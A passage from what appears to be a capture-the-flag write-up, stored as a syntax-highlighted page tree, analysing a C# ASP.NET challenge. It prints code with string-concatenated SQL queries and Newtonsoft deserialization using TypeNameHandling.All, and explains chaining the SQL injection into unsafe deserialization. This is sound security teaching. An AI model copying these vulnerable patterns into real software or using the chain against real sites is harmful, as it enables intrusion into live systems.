}\n",{"type":32,"tag":89,"props":1278,"children":1280},{"class":91,"line":1279},35,[1281],{"type":32,"tag":89,"props":1282,"children":1283},{"style":143},[1284],{"type":37,"value":1285}," else\n",{"type":32,"tag":89,"props":1287,"children":1289},{"class":91,"line":1288},36,[1290],{"type":32,"tag":89,"props":1291,"children":1292},{"style":124},[1293],{"type":37,"value":839},{"type":32,"tag":89,"props":1295,"children":1297},{"class":91,"line":1296},37,[1298,1302,1307,1311,1315,1319,1323,1327,1331,1336,1340,1344,1348],{"type":32,"tag":89,"props":1299,"children":1300},{"style":143},[1301],{"type":37,"value":1124},{"type":32,"tag":89,"props":1303,"children":1304},{"style":118},[1305],{"type":37,"value":1306}," username",{"type":32,"tag":89,"props":1308,"children":1309},{"style":124},[1310],{"type":37,"value":156},{"type":32,"tag":89,"props":1312,"children":1313},{"style":159},[1314],{"type":37,"value":162},{"type":32,"tag":89,"props":1316,"children":1317},{"style":124},[1318],{"type":37,"value":167},{"type":32,"tag":89,"props":1320,"children":1321},{"style":159},[1322],{"type":37,"value":172},{"type":32,"tag":89,"props":1324,"children":1325},{"style":124},[1326],{"type":37,"value":177},{"type":32,"tag":89,"props":1328,"children":1329},{"style":180},[1330],{"type":37,"value":183},{"type":32,"tag":89,"props":1332,"children":1333},{"style":186},[1334],{"type":37,"value":1335},"username",{"type":32,"tag":89,"props":1337,"children":1338},{"style":180},[1339],{"type":37,"value":183},{"type":32,"tag":89,"props":1341,"children":1342},{"style":124},[1343],{"type":37,"value":198},{"type":32,"tag":89,"props":1345,"children":1346},{"style":118},[1347],{"type":37,"value":203},{"type":32,"tag":89,"props":1349,"children":1350},{"style":124},[1351],{"type":37,"value":208},{"type":32,"tag":89,"props":1353,"children":1355},{"class":91,"line":1354},38,[1356,1360,1364,1368,1372,1377,1381,1386,1391,1395,1399],{"type":32,"tag":89,"props":1357,"children":1358},{"style":112},[1359],{"type":37,"value":848},{"type":32,"tag":89,"props":1361,"children":1362},{"style":124},[1363],{"type":37,"value":853},{"type":32,"tag":89,"props":1365,"children":1366},{"style":112},[1367],{"type":37,"value":858},{"type":32,"tag":89,"props":1369,"children":1370},{"style":124},[1371],{"type":37,"value":863},{"type":32,"tag":89,"props":1373,"children":1374},{"style":118},[1375],{"type":37,"value":1376}," wishListProducts",{"type":32,"tag":89,"props":1378,"children":1379},{"style":124},[1380],{"type":37,"value":156},{"type":32,"tag":89,"props":1382,"children":1383},{"style":106},[1384],{"type":37,"value":1385}," new",{"type":32,"tag":89,"props":1387,"children":1388},{"style":112},[1389],{"type":37,"value":1390}," List",{"type":32,"tag":89,"props":1392,"children":1393},{"style":124},[1394],{"type":37,"value":853},{"type":32,"tag":89,"props":1396,"children":1397},{"style":112},[1398],{"type":37,"value":858},{"type":32,"tag":89,"props":1400,"children":1401},{"style":124},[1402],{"type":37,"value":1403},">();\n",{"type":32,"tag":89,"props":1405,"children":1407},{"class":91,"line":1406},39,[1408,1413,1417,1421,1425,1429],{"type":32,"tag":89,"props":1409,"children":1410},{"style":159},[1411],{"type":37,"value":1412}," wishListProducts",{"type":32,"tag":89,"props":1414,"children":1415},{"style":124},[1416],{"type":37,"value":167},{"type":32,"tag":89,"props":1418,"children":1419},{"style":118},[1420],{"type":37,"value":1103},{"type":32,"tag":89,"props":1422,"children":1423},{"style":124},[1424],{"type":37,"value":357},{"type":32,"tag":89,"props":1426,"children":1427},{"style":159},[1428],{"type":37,"value":736},{"type":32,"tag":89,"props":1430,"children":1431},{"style":124},[1432],{"type":37,"value":907},{"type":32,"tag":89,"props":1434,"children":1436},{"class":91,"line":1435},40,[1437,1441,1445,1449,1453,1457,1461,1465,1470],{"type":32,"tag":89,"props":1438,"children":1439},{"style":143},[1440],{"type":37,"value":1124},{"type":32,"tag":89,"props":1442,"children":1443},{"style":118},[1444],{"type":37,"value":1129},{"type":32,"tag":89,"props":1446,"children":1447},{"style":124},[1448],{"type":37,"value":156},{"type":32,"tag":89,"props":1450,"children":1451},{"style":159},[1452],{"type":37,"value":877},{"type":32,"tag":89,"props":1454,"children":1455},{"style":124},[1456],{"type":37,"value":167},{"type":32,"tag":89,"props":1458,"children":1459},{"style":118},[1460],{"type":37,"value":1146},{"type":32,"tag":89,"props":1462,"children":1463},{"style":124},[1464],{"type":37,"value":357},{"type":32,"tag":89,"props":1466,"children":1467},{"style":159},[1468],{"type":37,"value":1469},"wishListProducts",{"type":32,"tag":89,"props":1471,"children":1472},{"style":124},[1473],{"type":37,"value":907},{"type":32,"tag":89,"props":1475,"children":1477},{"class":91,"line":1476},41,[1478,1482,1486,1490,1494,1499,1503,1507,1511,1516,1520,1524,1528,1533,1537,1541,1545,1550,1554,1558],{"type":32,"tag":89,"props":1479,"children":1480},{"style":143},[1481],{"type":37,"value":1124},{"type":32,"tag":89,"props":1483,"children":1484},{"style":118},[1485],{"type":37,"value":1172},{"type":32,"tag":89,"props":1487,"children":1488},{"style":124},[1489],{"type":37,"value":156},{"type":32,"tag":89,"props":1491,"children":1492},{"style":180},[1493],{"type":37,"value":230},{"type":32,"tag":89,"props":1495,"children":1496},{"style":186},[1497],{"type":37,"value":1498},"INSERT INTO Wishlist(ID, username, data) VALUES(",{"type":32,"tag":89,"props":1500,"children":1501},{"style":124},[1502],{"type":37,"value":240},{"type":32,"tag":89,"props":1504,"children":1505},{"style":186},[1506],{"type":37,"value":189},{"type":32,"tag":89,"props":1508,"children":1509},{"style":124},[1510],{"type":37,"value":249},{"type":32,"tag":89,"props":1512,"children":1513},{"style":186},[1514],{"type":37,"value":1515},",'",{"type":32,"tag":89,"props":1517,"children":1518},{"style":124},[1519],{"type":37,"value":240},{"type":32,"tag":89,"props":1521,"children":1522},{"style":186},[1523],{"type":37,"value":1335},{"type":32,"tag":89,"props":1525,"children":1526},{"style":124},[1527],{"type":37,"value":249},{"type":32,"tag":89,"props":1529,"children":1530},{"style":186},[1531],{"type":37,"value":1532},"', '",{"type":32,"tag":89,"props":1534,"children":1535},{"style":124},[1536],{"type":37,"value":240},{"type":32,"tag":89,"props":1538,"children":1539},{"style":186},[1540],{"type":37,"value":1194},{"type":32,"tag":89,"props":1542,"children":1543},{"style":124},[1544],{"type":37,"value":249},{"type":32,"tag":89,"props":1546,"children":1547},{"style":186},[1548],{"type":37,"value":1549},"')",{"type":32,"tag":89,"props":1551,"children":1552},{"style":180},[1553],{"type":37,"value":183},{"type":32,"tag":89,"props":1555,"children":1556},{"style":124},[1557],{"type":37,"value":263},{"type":32,"tag":89,"props":1559,"children":1560},{"style":96},[1561],{"type":37,"value":268},{"type":32,"tag":89,"props":1563,"children":1565},{"class":91,"line":1564},42,[1566,1570,1574,1578,1582,1586,1590,1594],{"type":32,"tag":89,"props":1567,"children":1568},{"style":159},[1569],{"type":37,"value":1236},{"type":32,"tag":89,"props":1571,"children":1572},{"style":124},[1573],{"type":37,"value":167},{"type":32,"tag":89,"props":1575,"children":1576},{"style":159},[1577],{"type":37,"value":1245},{"type":32,"tag":89,"props":1579,"children":1580},{"style":124},[1581],{"type":37,"value":167},{"type":32,"tag":89,"props":1583,"children":1584},{"style":118},[1585],{"type":37,"value":1254},{"type":32,"tag":89,"props":1587,"children":1588},{"style":124},[1589],{"type":37,"value":357},{"type":32,"tag":89,"props":1591,"children":1592},{"style":159},[1593],{"type":37,"value":1263},{"type":32,"tag":89,"props":1595,"children":1596},{"style":124},[1597],{"type":37,"value":907},{"type":32,"tag":89,"props":1599,"children":1601},{"class":91,"line":1600},43,[1602],{"type":32,"tag":89,"props":1603,"children":1604},{"style":124},[1605],{"type":37,"value":1276},{"type":32,"tag":89,"props":1607,"children":1609},{"class":91,"line":1608},44,[1610,1615,1619,1623,1627,1632,1636],{"type":32,"tag":89,"props":1611,"children":1612},{"style":143},[1613],{"type":37,"value":1614}," return",{"type":32,"tag":89,"props":1616,"children":1617},{"style":118},[1618],{"type":37,"value":1047},{"type":32,"tag":89,"props":1620,"children":1621},{"style":124},[1622],{"type":37,"value":357},{"type":32,"tag":89,"props":1624,"children":1625},{"style":180},[1626],{"type":37,"value":183},{"type":32,"tag":89,"props":1628,"children":1629},{"style":186},[1630],{"type":37,"value":1631},"Added",{"type":32,"tag":89,"props":1633,"children":1634},{"style":180},[1635],{"type":37,"value":183},{"type":32,"tag":89,"props":1637,"children":1638},{"style":124},[1639],{"type":37,"value":907},{"type":32,"tag":89,"props":1641,"children":1643},{"class":91,"line":1642},45,[1644],{"type":32,"tag":89,"props":1645,"children":1646},{"style":124},[1647],{"type":37,"value":1648}," }\n",{"type":32,"tag":89,"props":1650,"children":1652},{"class":91,"line":1651},46,[1653,1658,1662,1666,1670,1675,1679],{"type":32,"tag":89,"props":1654,"children":1655},{"style":143},[1656],{"type":37,"value":1657}," return",{"type":32,"tag":89,"props":1659,"children":1660},{"style":118},[1661],{"type":37,"value":1047},{"type":32,"tag":89,"props":1663,"children":1664},{"style":124},[1665],{"type":37,"value":357},{"type":32,"tag":89,"props":1667,"children":1668},{"style":180},[1669],{"type":37,"value":183},{"type":32,"tag":89,"props":1671,"children":1672},{"style":186},[1673],{"type":37,"value":1674},"Invalid",{"type":32,"tag":89,"props":1676,"children":1677},{"style":180},[1678],{"type":37,"value":183},{"type":32,"tag":89,"props":1680,"children":1681},{"style":124},[1682],{"type":37,"value":907},{"type":32,"tag":89,"props":1684,"children":1686},{"class":91,"line":1685},47,[1687],{"type":32,"tag":89,"props":1688,"children":1689},{"style":124},[1690],{"type":37,"value":311},{"type":32,"tag":46,"props":1692,"children":1693},{},[1694],{"type":37,"value":1695},"We can also see that SQL injections are present in select, insert, and update queries. The problem now is that the flag is not found in the database, so we need to use this SQL injection to our advantage to exploit another vulnerability. That's what we're going to see in the next section.",{"type":32,"tag":39,"props":1697,"children":1699},{"id":1698},"deserialization",[1700],{"type":37,"value":1701},"Deserialization",{"type":32,"tag":46,"props":1703,"children":1704},{},[1705],{"type":37,"value":1706},"Our first impression when discovering these SQLi was to exploit arbitrary file reading or remote code execution directly from an SQLi. However, since no SQLite module was loaded, we were unable to exploit this way.",{"type":32,"tag":46,"props":1708,"children":1709},{},[1710],{"type":37,"value":1711},"While navigating through the code, we can realize something quite peculiar, a serialization and deserialization is performed directly from the response of an SQL query.",{"type":32,"tag":74,"props":1713,"children":1714},{"lang":76},[1715],{"type":32,"tag":79,"props":1716,"children":1718},{"code":1717,"language":76,"meta":7,"className":82,"style":7},"[HttpGet]\npublic IActionResult Wishlist()\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\";\n var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n\n if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n {\n // Here we can see an deserialization directly from the database result\n List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n return View(products);\n\n }\n [...]\n}\n",[1719],{"type":32,"tag":85,"props":1720,"children":1721},{"__ignoreMap":7},[1722,1738,1757,1764,1819,1867,1922,1929,1992,1999,2007,2067,2091,2098,2105,2124],{"type":32,"tag":89,"props":1723,"children":1724},{"class":91,"line":92},[1725,1729,1734],{"type":32,"tag":89,"props":1726,"children":1727},{"style":124},[1728],{"type":37,"value":177},{"type":32,"tag":89,"props":1730,"children":1731},{"style":112},[1732],{"type":37,"value":1733},"HttpGet",{"type":32,"tag":89,"props":1735,"children":1736},{"style":124},[1737],{"type":37,"value":302},{"type":32,"tag":89,"props":1739,"children":1740},{"class":91,"line":102},[1741,1745,1749,1753],{"type":32,"tag":89,"props":1742,"children":1743},{"style":106},[1744],{"type":37,"value":109},{"type":32,"tag":89,"props":1746,"children":1747},{"style":112},[1748],{"type":37,"value":115},{"type":32,"tag":89,"props":1750,"children":1751},{"style":118},[1752],{"type":37,"value":121},{"type":32,"tag":89,"props":1754,"children":1755},{"style":124},[1756],{"type":37,"value":127},{"type":32,"tag":89,"props":1758,"children":1759},{"class":91,"line":130},[1760],{"type":32,"tag":89,"props":1761,"children":1762},{"style":124},[1763],{"type":37,"value":136},{"type":32,"tag":89,"props":1765,"children":1766},{"class":91,"line":139},[1767,1771,1775,1779,1783,1787,1791,1795,1799,1803,1807,1811,1815],{"type":32,"tag":89,"props":1768,"children":1769},{"style":143},[1770],{"type":37,"value":146},{"type":32,"tag":89,"props":1772,"children":1773},{"style":118},[1774],{"type":37,"value":151},{"type":32,"tag":89,"props":1776,"children":1777},{"style":124},[1778],{"type":37,"value":156},{"type":32,"tag":89,"props":1780,"children":1781},{"style":159},[1782],{"type":37,"value":162},{"type":32,"tag":89,"props":1784,"children":1785},{"style":124},[1786],{"type":37,"value":167},{"type":32,"tag":89,"props":1788,"children":1789},{"style":159},[1790],{"type":37,"value":172},{"type":32,"tag":89,"props":1792,"children":1793},{"style":124},[1794],{"type":37,"value":177},{"type":32,"tag":89,"props":1796,"children":1797},{"style":180},[1798],{"type":37,"value":183},{"type":32,"tag":89,"props":1800,"children":1801},{"style":186},[1802],{"type":37,"value":189},{"type":32,"tag":89,"props":1804,"children":1805},{"style":180},[1806],{"type":37,"value":183},{"type":32,"tag":89,"props":1808,"children":1809},{"style":124},[1810],{"type":37,"value":198},{"type":32,"tag":89,"props":1812,"children":1813},{"style":118},[1814],{"type":37,"value":203},{"type":32,"tag":89,"props":1816,"children":1817},{"style":124},[1818],{"type":37,"value":208},{"type":32,"tag":89,"props":1820,"children":1821},{"class":91,"line":211},[1822,1826,1830,1834,1838,1842,1846,1850,1854,1858,1862],{"type":32,"tag":89,"props":1823,"children":1824},{"style":143},[1825],{"type":37,"value":146},{"type":32,"tag":89,"props":1827,"children":1828},{"style":118},[1829],{"type":37,"value":221},{"type":32,"tag":89,"props":1831,"children":1832},{"style":124},[1833],{"type":37,"value":156},{"type":32,"tag":89,"props":1835,"children":1836},{"style":180},[1837],{"type":37,"value":230},{"type":32,"tag":89,"props":1839,"children":1840},{"style":186},[1841],{"type":37,"value":235},{"type":32,"tag":89,"props":1843,"children":1844},{"style":124},[1845],{"type":37,"value":240},{"type":32,"tag":89,"props":1847,"children":1848},{"style":186},[1849],{"type":37,"value":189},{"type":32,"tag":89,"props":1851,"children":1852},{"style":124},[1853],{"type":37,"value":249},{"type":32,"tag":89,"props":1855,"children":1856},{"style":186},[1857],{"type":37,"value":254},{"type":32,"tag":89,"props":1859,"children":1860},{"style":180},[1861],{"type":37,"value":183},{"type":32,"tag":89,"props":1863,"children":1864},{"style":124},[1865],{"type":37,"value":1866},";\n",{"type":32,"tag":89,"props":1868,"children":1869},{"class":91,"line":271},[1870,1874,1878,1882,1886,1890,1894,1898,1902,1906,1910,1914,1918],{"type":32,"tag":89,"props":1871,"children":1872},{"style":106},[1873],{"type":37,"value":509},{"type":32,"tag":89,"props":1875,"children":1876},{"style":118},[1877],{"type":37,"value":514},{"type":32,"tag":89,"props":1879,"children":1880},{"style":124},[1881],{"type":37,"value":156},{"type":32,"tag":89,"props":1883,"children":1884},{"style":159},[1885],{"type":37,"value":523},{"type":32,"tag":89,"props":1887,"children":1888},{"style":124},[1889],{"type":37,"value":167},{"type":32,"tag":89,"props":1891,"children":1892},{"style":159},[1893],{"type":37,"value":532},{"type":32,"tag":89,"props":1895,"children":1896},{"style":124},[1897],{"type":37,"value":167},{"type":32,"tag":89,"props":1899,"children":1900},{"style":118},[1901],{"type":37,"value":541},{"type":32,"tag":89,"props":1903,"children":1904},{"style":124},[1905],{"type":37,"value":357},{"type":32,"tag":89,"props":1907,"children":1908},{"style":159},[1909],{"type":37,"value":550},{"type":32,"tag":89,"props":1911,"children":1912},{"style":124},[1913],{"type":37,"value":555},{"type":32,"tag":89,"props":1915,"children":1916},{"style":118},[1917],{"type":37,"value":560},{"type":32,"tag":89,"props":1919,"children":1920},{"style":124},[1921],{"type":37,"value":208},{"type":32,"tag":89,"props":1923,"children":1924},{"class":91,"line":281},[1925],{"type":32,"tag":89,"props":1926,"children":1927},{"emptyLinePlaceholder":275},[1928],{"type":37,"value":278},{"type":32,"tag":89,"props":1930,"children":1931},{"class":91,"line":305},[1932,1936,1940,1944,1948,1952,1956,1960,1964,1968,1972,1976,1980,1984,1988],{"type":32,"tag":89,"props":1933,"children":1934},{"style":143},[1935],{"type":37,"value":705},{"type":32,"tag":89,"props":1937,"children":1938},{"style":124},[1939],{"type":37,"value":772},{"type":32,"tag":89,"props":1941,"children":1942},{"style":159},[1943],{"type":37,"value":777},{"type":32,"tag":89,"props":1945,"children":1946},{"style":106},[1947],{"type":37,"value":782},{"type":32,"tag":89,"props":1949,"children":1950},{"style":106},[1951],{"type":37,"value":787},{"type":32,"tag":89,"props":1953,"children":1954},{"style":106},[1955],{"type":37,"value":792},{"type":32,"tag":89,"props":1957,"children":1958},{"style":106},[1959],{"type":37,"value":797},{"type":32,"tag":89,"props":1961,"children":1962},{"style":143},[1963],{"type":37,"value":362},{"type":32,"tag":89,"props":1965,"children":1966},{"style":124},[1967],{"type":37,"value":167},{"type":32,"tag":89,"props":1969,"children":1970},{"style":118},[1971],{"type":37,"value":727},{"type":32,"tag":89,"props":1973,"children":1974},{"style":124},[1975],{"type":37,"value":357},{"type":32,"tag":89,"props":1977,"children":1978},{"style":159},[1979],{"type":37,"value":777},{"type":32,"tag":89,"props":1981,"children":1982},{"style":124},[1983],{"type":37,"value":167},{"type":32,"tag":89,"props":1985,"children":1986},{"style":159},[1987],{"type":37,"value":826},{"type":32,"tag":89,"props":1989,"children":1990},{"style":124},[1991],{"type":37,"value":749},{"type":32,"tag":89,"props":1993,"children":1994},{"class":91,"line":314},[1995],{"type":32,"tag":89,"props":1996,"children":1997},{"style":124},[1998],{"type":37,"value":758},{"type":32,"tag":89,"props":2000,"children":2001},{"class":91,"line":331},[2002],{"type":32,"tag":89,"props":2003,"children":2004},{"style":96},[2005],{"type":37,"value":2006}," // Here we can see an deserialization directly from the database result\n",{"type":32,"tag":89,"props":2008,"children":2009},{"class":91,"line":339},[2010,2015,2019,2023,2027,2031,2035,2039,2043,2047,2051,2055,2059,2063],{"type":32,"tag":89,"props":2011,"children":2012},{"style":112},[2013],{"type":37,"value":2014}," List",{"type":32,"tag":89,"props":2016,"children":2017},{"style":124},[2018],{"type":37,"value":853},{"type":32,"tag":89,"props":2020,"children":2021},{"style":112},[2022],{"type":37,"value":858},{"type":32,"tag":89,"props":2024,"children":2025},{"style":124},[2026],{"type":37,"value":863},{"type":32,"tag":89,"props":2028,"children":2029},{"style":118},[2030],{"type":37,"value":868},{"type":32,"tag":89,"props":2032,"children":2033},{"style":124},[2034],{"type":37,"value":156},{"type":32,"tag":89,"props":2036,"children":2037},{"style":159},[2038],{"type":37,"value":877},{"type":32,"tag":89,"props":2040,"children":2041},{"style":124},[2042],{"type":37,"value":167},{"type":32,"tag":89,"props":2044,"children":2045},{"style":118},[2046],{"type":37,"value":886},{"type":32,"tag":89,"props":2048,"children":2049},{"style":124},[2050],{"type":37,"value":357},{"type":32,"tag":89,"props":2052,"children":2053},{"style":159},[2054],{"type":37,"value":777},{"type":32,"tag":89,"props":2056,"children":2057},{"style":124},[2058],{"type":37,"value":167},{"type":32,"tag":89,"props":2060,"children":2061},{"style":159},[2062],{"type":37,"value":826},{"type":32,"tag":89,"props":2064,"children":2065},{"style":124},[2066],{"type":37,"value":907},{"type":32,"tag":89,"props":2068,"children":2069},{"class":91,"line":390},[2070,2074,2079,2083,2087],{"type":32,"tag":89,"props":2071,"children":2072},{"style":143},[2073],{"type":37,"value":1614},{"type":32,"tag":89,"props":2075,"children":2076},{"style":118},[2077],{"type":37,"value":2078}," View",{"type":32,"tag":89,"props":2080,"children":2081},{"style":124},[2082],{"type":37,"value":357},{"type":32,"tag":89,"props":2084,"children":2085},{"style":159},[2086],{"type":37,"value":1155},{"type":32,"tag":89,"props":2088,"children":2089},{"style":124},[2090],{"type":37,"value":907},{"type":32,"tag":89,"props":2092,"children":2093},{"class":91,"line":398},[2094],{"type":32,"tag":89,"props":2095,"children":2096},{"emptyLinePlaceholder":275},[2097],{"type":37,"value":278},{"type":32,"tag":89,"props":2099,"children":2100},{"class":91,"line":454},[2101],{"type":32,"tag":89,"props":2102,"children":2103},{"style":124},[2104],{"type":37,"value":1648},{"type":32,"tag":89,"props":2106,"children":2107},{"class":91,"line":503},[2108,2112,2116,2120],{"type":32,"tag":89,"props":2109,"children":2110},{"style":124},[2111],{"type":37,"value":287},{"type":32,"tag":89,"props":2113,"children":2114},{"style":106},[2115],{"type":37,"value":292},{"type":32,"tag":89,"props":2117,"children":2118},{"style":295},[2119],{"type":37,"value":167},{"type":32,"tag":89,"props":2121,"children":2122},{"style":124},[2123],{"type":37,"value":302},{"type":32,"tag":89,"props":2125,"children":2126},{"class":91,"line":567},[2127],{"type":32,"tag":89,"props":2128,"children":2129},{"style":124},[2130],{"type":37,"value":311},{"type":32,"tag":46,"props":2132,"children":2133},{},[2134],{"type":37,"value":2135},"And the SerializeHelper class is as follows:",{"type":32,"tag":74,"props":2137,"children":2138},{"lang":76},[2139],{"type":32,"tag":79,"props":2140,"children":2142},{"code":2141,"language":76,"meta":7,"className":82,"style":7},"using Newtonsoft.Json;\nusing Nexus_Void.Models;\n\nnamespace Nexus_Void.Helpers\n{\n public class SerializeHelper\n {\n public static string Serialize(List\u003CProductModel> list)\n {\n string serializedResult = JsonConvert.SerializeObject(list, new JsonSerializerSettings\n {\n TypeNameHandling = TypeNameHandling.All\n });\n\n string encodedData = EncodeHelper.Encode(serializedResult);\n return encodedData;\n }\n\n public static List\u003CProductModel> Deserialize(string str) \n {\n string decodedData = EncodeHelper.Decode(str);\n \n // unsafe deserialization\n var deserialized = JsonConvert.DeserializeObject(decodedData, new JsonSerializerSettings\n {\n TypeNameHandling = TypeNameHandling.All\n });\n\n List\u003CProductModel> products = deserialized as List\u003CProductModel>;\n\n return products;\n }\n }\n}\n",[2143],{"type":32,"tag":85,"props":2144,"children":2145},{"__ignoreMap":7},[2146,2172,2197,2204,2225,2232,2250,2257,2309,2316,2368,2375,2401,2409,2416,2459,2475,2482,2489,2544,2551,2593,2601,2609,2660,2667,2690,2697,2704,2757,2764,2779,2786,2793],{"type":32,"tag":89,"props":2147,"children":2148},{"class":91,"line":92},[2149,2154,2159,2163,2168],{"type":32,"tag":89,"props":2150,"children":2151},{"style":143},[2152],{"type":37,"value":2153},"using",{"type":32,"tag":89,"props":2155,"children":2156},{"style":112},[2157],{"type":37,"value":2158}," Newtonsoft",{"type":32,"tag":89,"props":2160,"children":2161},{"style":124},[2162],{"type":37,"value":167},{"type":32,"tag":89,"props":2164,"children":2165},{"style":112},[2166],{"type":37,"value":2167},"Json",{"type":32,"tag":89,"props":2169,"children":2170},{"style":124},[2171],{"type":37,"value":1866},{"type":32,"tag":89,"props":2173,"children":2174},{"class":91,"line":102},[2175,2179,2184,2188,2193],{"type":32,"tag":89,"props":2176,"children":2177},{"style":143},[2178],{"type":37,"value":2153},{"type":32,"tag":89,"props":2180,"children":2181},{"style":112},[2182],{"type":37,"value":2183}," Nexus_Void",{"type":32,"tag":89,"props":2185,"children":2186},{"style":124},[2187],{"type":37,"value":167},{"type":32,"tag":89,"props":2189,"children":2190},{"style":112},[2191],{"type":37,"value":2192},"Models",{"type":32,"tag":89,"props":2194,"children":2195},{"style":124},[2196],{"type":37,"value":1866},{"type":32,"tag":89,"props":2198,"children":2199},{"class":91,"line":130},[2200],{"type":32,"tag":89,"props":2201,"children":2202},{"emptyLinePlaceholder":275},[2203],{"type":37,"value":278},{"type":32,"tag":89,"props":2205,"children":2206},{"class":91,"line":139},[2207,2212,2216,2220],{"type":32,"tag":89,"props":2208,"children":2209},{"style":106},[2210],{"type":37,"value":2211},"namespace",{"type":32,"tag":89,"props":2213,"children":2214},{"style":112},[2215],{"type":37,"value":2183},{"type":32,"tag":89,"props":2217,"children":2218},{"style":124},[2219],{"type":37,"value":167},{"type":32,"tag":89,"props":2221,"children":2222},{"style":112},[2223],{"type":37,"value":2224},"Helpers\n",{"type":32,"tag":89,"props":2226,"children":2227},{"class":91,"line":211},[2228],{"type":32,"tag":89,"props":2229,"children":2230},{"style":124},[2231],{"type":37,"value":136},{"type":32,"tag":89,"props":2233,"children":2234},{"class":91,"line":271},[2235,2240,2245],{"type":32,"tag":89,"props":2236,"children":2237},{"style":106},[2238],{"type":37,"value":2239}," public",{"type":32,"tag":89,"props":2241,"children":2242},{"style":106},[2243],{"type":37,"value":2244}," class",{"type":32,"tag":89,"props":2246,"children":2247},{"style":112},[2248],{"type":37,"value":2249}," SerializeHelper\n",{"type":32,"tag":89,"props":2251,"children":2252},{"class":91,"line":281},[2253],{"type":32,"tag":89,"props":2254,"children":2255},{"style":124},[2256],{"type":37,"value":758},{"type":32,"tag":89,"props":2258,"children":2259},{"class":91,"line":305},[2260,2265,2270,2274,2279,2283,2288,2292,2296,2300,2305],{"type":32,"tag":89,"props":2261,"children":2262},{"style":106},[2263],{"type":37,"value":2264}," public",{"type":32,"tag":89,"props":2266,"children":2267},{"style":106},[2268],{"type":37,"value":2269}," static",{"type":32,"tag":89,"props":2271,"children":2272},{"style":143},[2273],{"type":37,"value":377},{"type":32,"tag":89,"props":2275,"children":2276},{"style":118},[2277],{"type":37,"value":2278}," Serialize",{"type":32,"tag":89,"props":2280,"children":2281},{"style":124},[2282],{"type":37,"value":357},{"type":32,"tag":89,"props":2284,"children":2285},{"style":112},[2286],{"type":37,"value":2287},"List",{"type":32,"tag":89,"props":2289,"children":2290},{"style":124},[2291],{"type":37,"value":853},{"type":32,"tag":89,"props":2293,"children":2294},{"style":112},[2295],{"type":37,"value":858},{"type":32,"tag":89,"props":2297,"children":2298},{"style":124},[2299],{"type":37,"value":863},{"type":32,"tag":89,"props":2301,"children":2302},{"style":118},[2303],{"type":37,"value":2304}," list",{"type":32,"tag":89,"props":2306,"children":2307},{"style":124},[2308],{"type":37,"value":387},{"type":32,"tag":89,"props":2310,"children":2311},{"class":91,"line":314},[2312],{"type":32,"tag":89,"props":2313,"children":2314},{"style":124},[2315],{"type":37,"value":839},{"type":32,"tag":89,"props":2317,"children":2318},{"class":91,"line":331},[2319,2323,2328,2332,2337,2341,2346,2350,2355,2359,2363],{"type":32,"tag":89,"props":2320,"children":2321},{"style":143},[2322],{"type":37,"value":1124},{"type":32,"tag":89,"props":2324,"children":2325},{"style":118},[2326],{"type":37,"value":2327}," serializedResult",{"type":32,"tag":89,"props":2329,"children":2330},{"style":124},[2331],{"type":37,"value":156},{"type":32,"tag":89,"props":2333,"children":2334},{"style":159},[2335],{"type":37,"value":2336}," JsonConvert",{"type":32,"tag":89,"props":2338,"children":2339},{"style":124},[2340],{"type":37,"value":167},{"type":32,"tag":89,"props":2342,"children":2343},{"style":118},[2344],{"type":37,"value":2345},"SerializeObject",{"type":32,"tag":89,"props":2347,"children":2348},{"style":124},[2349],{"type":37,"value":357},{"type":32,"tag":89,"props":2351,"children":2352},{"style":159},[2353],{"type":37,"value":2354},"list",{"type":32,"tag":89,"props":2356,"children":2357},{"style":124},[2358],{"type":37,"value":372},{"type":32,"tag":89,"props":2360,"children":2361},{"style":106},[2362],{"type":37,"value":1385},{"type":32,"tag":89,"props":2364,"children":2365},{"style":112},[2366],{"type":37,"value":2367}," JsonSerializerSettings\n",{"type":32,"tag":89,"props":2369,"children":2370},{"class":91,"line":339},[2371],{"type":32,"tag":89,"props":2372,"children":2373},{"style":124},[2374],{"type":37,"value":1033},{"type":32,"tag":89,"props":2376,"children":2377},{"class":91,"line":390},[2378,2383,2387,2392,2396],{"type":32,"tag":89,"props":2379,"children":2380},{"style":159},[2381],{"type":37,"value":2382}," TypeNameHandling",{"type":32,"tag":89,"props":2384,"children":2385},{"style":124},[2386],{"type":37,"value":156},{"type":32,"tag":89,"props":2388,"children":2389},{"style":159},[2390],{"type":37,"value":2391}," TypeNameHandling",{"type":32,"tag":89,"props":2393,"children":2394},{"style":124},[2395],{"type":37,"value":167},{"type":32,"tag":89,"props":2397,"children":2398},{"style":159},[2399],{"type":37,"value":2400},"All\n",{"type":32,"tag":89,"props":2402,"children":2403},{"class":91,"line":398},[2404],{"type":32,"tag":89,"props":2405,"children":2406},{"style":124},[2407],{"type":37,"value":2408}," });\n",{"type":32,"tag":89,"props":2410,"children":2411},{"class":91,"line":454},[2412],{"type":32,"tag":89,"props":2413,"children":2414},{"emptyLinePlaceholder":275},[2415],{"type":37,"value":278},{"type":32,"tag":89,"props":2417,"children":2418},{"class":91,"line":503},[2419,2423,2428,2432,2437,2441,2446,2450,2455],{"type":32,"tag":89,"props":2420,"children":2421},{"style":143},[2422],{"type":37,"value":1124},{"type":32,"tag":89,"props":2424,"children":2425},{"style":118},[2426],{"type":37,"value":2427}," encodedData",{"type":32,"tag":89,"props":2429,"children":2430},{"style":124},[2431],{"type":37,"value":156},{"type":32,"tag":89,"props":2433,"children":2434},{"style":159},[2435],{"type":37,"value":2436}," EncodeHelper",{"type":32,"tag":89,"props":2438,"children":2439},{"style":124},[2440],{"type":37,"value":167},{"type":32,"tag":89,"props":2442,"children":2443},{"style":118},[2444],{"type":37,"value":2445},"Encode",{"type":32,"tag":89,"props":2447,"children":2448},{"style":124},[2449],{"type":37,"value":357},{"type":32,"tag":89,"props":2451,"children":2452},{"style":159},[2453],{"type":37,"value":2454},"serializedResult",{"type":32,"tag":89,"props":2456,"children":2457},{"style":124},[2458],{"type":37,"value":907},{"type":32,"tag":89,"props":2460,"children":2461},{"class":91,"line":567},[2462,2467,2471],{"type":32,"tag":89,"props":2463,"children":2464},{"style":143},[2465],{"type":37,"value":2466}," 